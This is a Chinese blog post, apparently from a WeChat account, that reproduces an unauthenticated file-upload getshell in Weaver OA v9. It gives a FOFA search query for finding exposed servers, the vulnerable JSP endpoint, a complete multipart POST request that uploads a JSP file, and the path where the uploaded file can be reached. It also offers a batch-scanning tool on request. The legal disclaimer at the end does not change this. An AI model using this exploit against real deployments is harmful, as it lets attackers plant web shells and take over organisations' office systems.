泛微OA v9 前台getshell复现 4-8号

  泛微OA v9 是一款功能强大的泛微协同办公系统标准版程序，其可为用户提供一个协同、集成的办公环境，并且能使所有的办公人员都在统一且个性化的信息门户中一起工作，摆脱时间和地域的限制，实现协同工作与知识管理。

泛微OA v9 存在getshell漏洞

二、漏洞复现

祭出fofa大法，fofa语法如下

app="Weaver-OA"（写法过于笼统导致能抓到各个版本的这里自行处理）

漏洞存在: /page/exportImport/uploadOperation.jsp

非常简单的利用 只需要127.0.0.1/page/exportImport/uploadOperation.jsp

弄个multipartRequest就OK了

poc如何

POST /page/exportImport/uploadOperation.jsp HTTP/1.1Host: xxx.xxx.xxx.xxx:xxxxContent-Length: 211Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://xxx.xxx.xxx.xxx:xxxx/Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwoConnection: close------WebKitFormBoundaryFy3iNVBftjP6IOwoContent-Disposition: form-data; name="file"; filename="1.jsp"Content-Type: application/octet-stream<%out.print(1237);%>------WebKitFormBoundaryFy3iNVBftjP6IOwo--

访问请求路径:

page/exportImport/fileTransfer/1.jsp

已制批量检测，需要批量检测poc的可以对公众号留言。也欢迎大家踊跃留言和提问，尽量帮到大家

特别声明：

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者的允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。 切勿用于非法，仅供学习参考

原文始发于微信公众号（深夜笔记本）：热议-泛微OA v9 前台getshell复现 4-8号